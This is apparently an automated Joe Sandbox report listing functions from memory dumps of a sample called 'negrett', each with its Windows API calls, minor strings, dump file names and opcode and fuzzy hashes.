Function 00B7C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17620: _wcslen.LIBCMT ref: 00B17625

GetMenuItemInfoW.USER32 ref: 00B7C6EE
_wcslen.LIBCMT ref: 00B7C735
SetMenuItemInfoW.USER32 ref: 00B7C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B7C7CA

Strings

0, xrefs: 00B7C6AF

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 93395b892a28984e0fd96f493a8fb83189f0a21b48e31e15413b45eb7a148da4
Instruction ID: 42e5236fd41bf5cc1f0f2e2b355be7e9876a73a6fa80085934fe30d2466adcb2
Opcode Fuzzy Hash: 93395b892a28984e0fd96f493a8fb83189f0a21b48e31e15413b45eb7a148da4
Instruction Fuzzy Hash: 9251EE716043019BD7199F28C885B6B7BE8EF89310F148AADF9A9E31A0DB70DD049B52

Uniqueness

Uniqueness Score: -1.00%

Function 00B9AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00B9AEA3

Part of subcall function 00B17620: _wcslen.LIBCMT ref: 00B17625

GetProcessId.KERNEL32(00000000), ref: 00B9AF38
CloseHandle.KERNEL32(00000000), ref: 00B9AF67

Strings

<, xrefs: 00B9AE6B
@, xrefs: 00B9AE72

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 2ec043206ffc3bfcab8c8ed0e876b094b4c2a266b716505dda17e618b35ab879
Instruction ID: 27bfce18af200ec6275a79a4624b134e365e836cb06cfe01f7348f619cc0b463
Opcode Fuzzy Hash: 2ec043206ffc3bfcab8c8ed0e876b094b4c2a266b716505dda17e618b35ab879
Instruction Fuzzy Hash: F2713570A00619DFCF14EF54C494A9EBBF1EF08314F1484A9E81AAB292CB75ED85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B34D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B34D1E,00B428E9,?,00B34CBE,00B428E9,00BD88B8,0000000C,00B34E15,00B428E9,00000002), ref: 00B34D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,00B34D1E,00B428E9,?,00B34CBE,00B428E9,00BD88B8,0000000C,00B34E15,00B428E9,00000002), ref: 00B34DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00B34D1E,00B428E9,?,00B34CBE,00B428E9,00BD88B8,0000000C,00B34E15,00B428E9,00000002,00000000), ref: 00B34DC3

Strings

CorExitProcess, xrefs: 00B34D98
mscoree.dll, xrefs: 00B34D86

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: afc3750c3edaec38e7aded86f00e0d113c1b5880d79f3e4b9b101a933106aff7
Instruction ID: b5e2f781cb677d859eee80c9b2a5bbedfe490ef23e39f1ba117159265716c274
Opcode Fuzzy Hash: afc3750c3edaec38e7aded86f00e0d113c1b5880d79f3e4b9b101a933106aff7
Instruction Fuzzy Hash: 5BF03C34A50208ABDB119B95DC4ABAEBFE5EF44751F1001A4E80AA3260DF70AD40CA90

Uniqueness

Uniqueness Score: -1.00%

Function 02A5A3F9 Relevance: 7.9, APIs: 5, Instructions: 418COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A5A598
_wcslen.LIBCMT ref: 02A5A600
_wcslen.LIBCMT ref: 02A5A732
_wcslen.LIBCMT ref: 02A5A74B
_wcslen.LIBCMT ref: 02A5A766

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 8bb47df1574b82508a8568e42ad549eacc8411e96a2d4b59b127870c91da2114
Instruction ID: 6f36dd869536fcdf7bc4c539c5e55c53a2745d4554481fc07a96ab0b3ac48542
Opcode Fuzzy Hash: 8bb47df1574b82508a8568e42ad549eacc8411e96a2d4b59b127870c91da2114
Instruction Fuzzy Hash: EBF19D71604350DFCB15EF24C890B6BBBE6AF85314F14855DE88A9B2A2CF35E845CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00B9A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00B9A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B9A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B9A468
CloseHandle.KERNEL32(?), ref: 00B9A63D

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: de856f311391644930f38d4f0c870798dbc7bc02590da363a6e5e361beabbbc8
Instruction ID: 7886c9182540e4b44d482401d3b3b33479e2c4af5cc6ee29daa90b49ff1bfcbd
Opcode Fuzzy Hash: de856f311391644930f38d4f0c870798dbc7bc02590da363a6e5e361beabbbc8
Instruction Fuzzy Hash: 71A180716043009FDB20DF24D886F2AB7E5AF94714F5488ADF5599B392DB70EC418B92

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B7DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B7CF22,?), ref: 00B7DDFD

Part of subcall function 00B7DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B7CF22,?), ref: 00B7DE16

Part of subcall function 00B7E199: GetFileAttributesW.KERNEL32(?,00B7CF95), ref: 00B7E19A

lstrcmpiW.KERNEL32(?,?), ref: 00B7E473
MoveFileW.KERNEL32 ref: 00B7E4AC
_wcslen.LIBCMT ref: 00B7E5EB
_wcslen.LIBCMT ref: 00B7E603
SHFileOperationW.SHELL32 ref: 00B7E650

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 4381f51a22fb0e5dfedb3011f2d5dfb9ad5cf0655dfa4214d8174ad7352de50b
Instruction ID: d6ebcb0456180c79cb90298e4e4d1540ea75ce7abca2445a070c348fe2effcf6
Opcode Fuzzy Hash: 4381f51a22fb0e5dfedb3011f2d5dfb9ad5cf0655dfa4214d8174ad7352de50b
Instruction Fuzzy Hash: C05173B24083859BC724DB90D8819DF73ECEF89340F50499EF5A9D3151EF74E6888766

Uniqueness

Uniqueness Score: -1.00%

Function 00B78BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B78BCD
VariantClear.OLEAUT32 ref: 00B78C3E
VariantClear.OLEAUT32 ref: 00B78C9D
VariantClear.OLEAUT32(?), ref: 00B78D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B78D3B

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 7a880ebad2fb641654e568d3abd6a6694cd9e0924565eb5af0f9e8eba3eebe48
Instruction ID: 41580c306243f60af787aa946e7739751482bbc300bfa390d87075bf58a2e5d3
Opcode Fuzzy Hash: 7a880ebad2fb641654e568d3abd6a6694cd9e0924565eb5af0f9e8eba3eebe48
Instruction Fuzzy Hash: 19515D75A00219EFCB14CF68C894AAABBF5FF8D310B158569E919DB350DB30E911CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B88AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32 ref: 00B88BAE
GetPrivateProfileSectionW.KERNEL32 ref: 00B88BDA
WritePrivateProfileSectionW.KERNEL32 ref: 00B88C32
WritePrivateProfileStringW.KERNEL32 ref: 00B88C57
WritePrivateProfileStringW.KERNEL32 ref: 00B88C5F

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: a9675e437eeb38af4bfd7153293294556d1c486829d2b38823eb8770e4cdffb4
Instruction ID: 55157d433ad2ffae74de960847888a1a7c681d4b839e224caa1378dc0bbe7b15
Opcode Fuzzy Hash: a9675e437eeb38af4bfd7153293294556d1c486829d2b38823eb8770e4cdffb4
Instruction Fuzzy Hash: B6513935A00219DFCB15EF64C891AADBBF5FF49314F488498E849AB362DB31ED51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BA6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 00BA6C33
SetWindowLongW.USER32 ref: 00BA6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00BA6C73
ShowWindow.USER32(00000002,00000000), ref: 00BA6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 00BA6CC7

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: a80da4220d9d439c69e32235ad817473305817559efea898d4ca59980e2bbd32
Instruction ID: 7f1ac85eb456b40183589b66d1c1c9e9f180ec8e6018b7f1282b0d56629c5a99
Opcode Fuzzy Hash: a80da4220d9d439c69e32235ad817473305817559efea898d4ca59980e2bbd32
Instruction Fuzzy Hash: 3C41B5B5A08104BFD724DF28CC95FA97BE5EB0B360F1902A4F855A72E1D771AD41C650

Uniqueness

Uniqueness Score: -1.00%

Function 02A01451 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02A014C3
_free.LIBCMT ref: 02A014E3

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3890d703f7ea146fcb4efc749df72bd74b23163155a5f2f9b3b7e357d1c9b5e8
Instruction ID: 52a351b3e89a4a148aa7bac985d5d18ea6ad20ac56b8d61759f1dbe6c1afc889
Opcode Fuzzy Hash: 3890d703f7ea146fcb4efc749df72bd74b23163155a5f2f9b3b7e357d1c9b5e8
Instruction Fuzzy Hash: 0641D676A402049FCB24DFB8D9C0A9DB7F6EF89714F1545A9D51AEB390DB31E901CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00B42051 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B420C3
_free.LIBCMT ref: 00B420E3

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3ef6c03ab5246ef55c89b643c32a9a2ce576d11849372ccfc7c191bbf6455716
Instruction ID: a090c536b846d6a067d8d7d532860f7d767f7065a74da97ef8d1c615e61f5a38
Opcode Fuzzy Hash: 3ef6c03ab5246ef55c89b643c32a9a2ce576d11849372ccfc7c191bbf6455716
Instruction Fuzzy Hash: D841D232A002109FDB24DF78C881A5EB7F5EF89314F5545A9F515EB356DB31AE01EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00B90930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00B90951
GetForegroundWindow.USER32 ref: 00B90968
GetDC.USER32(00000000), ref: 00B909A4
GetPixel.GDI32(00000000,?,00000003), ref: 00B909B0
ReleaseDC.USER32(00000000,00000003), ref: 00B909E8

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: e00dbe52cb4815b5ba21ddf9d860db00d280cbe7bc2397325d2b9e04b01198af
Instruction ID: e543d7bd13de03f3d69e13ed39ce852990ceba027c2800320bd8b41be5c9cc87
Opcode Fuzzy Hash: e00dbe52cb4815b5ba21ddf9d860db00d280cbe7bc2397325d2b9e04b01198af
Instruction Fuzzy Hash: FE218135600204AFD704EF69C985AAEBBE9EF45700F0484ACE84AA7362DB30AC44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B4CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B4CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4CDE9

Part of subcall function 00B43820: RtlAllocateHeap.NTDLL(00000000,?,00BE1444,?,00B2FDF5,?,?,00B1A976,00000010,00BE1440,00B113FC,?,00B113C6,?,00B11129), ref: 00B43852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B4CE0F
_free.LIBCMT ref: 00B4CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B4CE31

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 07f6067935d28ac95d43affe5c5ade049d55ffb30ff2a18643608ac206df1eab
Instruction ID: ebd0ee7c2a9ea47f09bc32dc1fb175894bcda2480b1b2dc0356498f1808b90ad
Opcode Fuzzy Hash: 07f6067935d28ac95d43affe5c5ade049d55ffb30ff2a18643608ac206df1eab
Instruction Fuzzy Hash: 2501D4726032157F27611ABA6C89C7B6EEDDEC7FA131501A9F905D7200EF619F02A1B1

Uniqueness

Uniqueness Score: -1.00%

Function 02A34B11 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 02A34B26
_memcmp.LIBVCRUNTIME ref: 02A34B44
_memcmp.LIBVCRUNTIME ref: 02A34B57
_memcmp.LIBVCRUNTIME ref: 02A34B6F
_memcmp.LIBVCRUNTIME ref: 02A34B87

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: b3e1830291eea80dcf21e65ab2d8b536b7e6a0cb8c488699daa5d9a5a3874387
Instruction ID: ad10590354088858678e8134bc39113a16de276d88487cae87743a059ae547d6
Opcode Fuzzy Hash: b3e1830291eea80dcf21e65ab2d8b536b7e6a0cb8c488699daa5d9a5a3874387
Instruction Fuzzy Hash: F801B5756412097BE6495E129C81FAF735DDA95398F004031FF08AA245FB74ED24CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B42DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00B3F2DE,00B43863,00BE1444,?,00B2FDF5,?,?,00B1A976,00000010,00BE1440,00B113FC,?,00B113C6), ref: 00B42DFD
_free.LIBCMT ref: 00B42E32
_free.LIBCMT ref: 00B42E59
SetLastError.KERNEL32(00000000,00B11129), ref: 00B42E66
SetLastError.KERNEL32(00000000,00B11129), ref: 00B42E6F

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 469ec415c86d47c4bb54139a36f2f48be6d1ba9d388491f34c0d21c53947955f
Instruction ID: 6652e5b43a02af84269bc2cf0ba1ef7e9265b5e7c59677ff2b3edd1e1859135e
Opcode Fuzzy Hash: 469ec415c86d47c4bb54139a36f2f48be6d1ba9d388491f34c0d21c53947955f
Instruction Fuzzy Hash: 7401F93218560177CA1267396C86D2B2AE9EBD17A17E440A5F411E3292EF74CF017120

Uniqueness

Uniqueness Score: -1.00%

Function 00B7000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00B7002B
ProgIDFromCLSID.OLE32(?,00000000), ref: 00B70046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B6FF41,80070057,?,?), ref: 00B70054
CoTaskMemFree.OLE32(00000000), ref: 00B70064
CLSIDFromString.OLE32(?,?), ref: 00B70070

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 427beb1d5271d733baa846e1dd1811967a197fb205d602c6ebe02e1e807e9884
Instruction ID: 88865652cc767af821fc9e20c424004438254cc9a153894ae7ef5804c338f688
Opcode Fuzzy Hash: 427beb1d5271d733baa846e1dd1811967a197fb205d602c6ebe02e1e807e9884
Instruction Fuzzy Hash: 06018B72610208FFDF116F68EC45BAA7EEDEB447A2F148165F90AD3210EB75DD409BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00B7E997
QueryPerformanceFrequency.KERNEL32(?), ref: 00B7E9A5
Sleep.KERNEL32(00000000), ref: 00B7E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 00B7E9B7
Sleep.KERNEL32 ref: 00B7E9F3

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 9cee797c38895124995d3419329216a85d917778a351344ad7df3c7385466d20
Instruction ID: 207399164c1a4355c016e8c6d58d9def3c0f64cd826aae7abcaec2f80c28611a
Opcode Fuzzy Hash: 9cee797c38895124995d3419329216a85d917778a351344ad7df3c7385466d20
Instruction Fuzzy Hash: DB011B32D01629DBCF009BE5D859ADDBBB8FF0E701F004596E626B2241CB349555CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B8030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00B80324
CloseHandle.KERNEL32(?), ref: 00B80331
CloseHandle.KERNEL32(?), ref: 00B8033E
CloseHandle.KERNEL32(?), ref: 00B8034B
CloseHandle.KERNEL32(?), ref: 00B80358
CloseHandle.KERNEL32(?), ref: 00B80365

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
